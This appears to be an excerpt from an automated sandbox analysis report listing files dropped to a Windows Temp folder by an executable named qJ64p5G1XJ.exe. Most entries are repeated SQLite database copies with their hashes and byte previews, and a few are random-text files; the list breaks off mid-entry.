
Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp250.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp261.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp272.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp273.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp283.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp294.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3A4F.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3A5F.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5823.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5833.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5844.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5854.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5855.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5866.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5877.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp916A.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp917A.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp918B.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp919C.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp919D.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp91AD.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp91AE.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA88B.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmpA88C.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
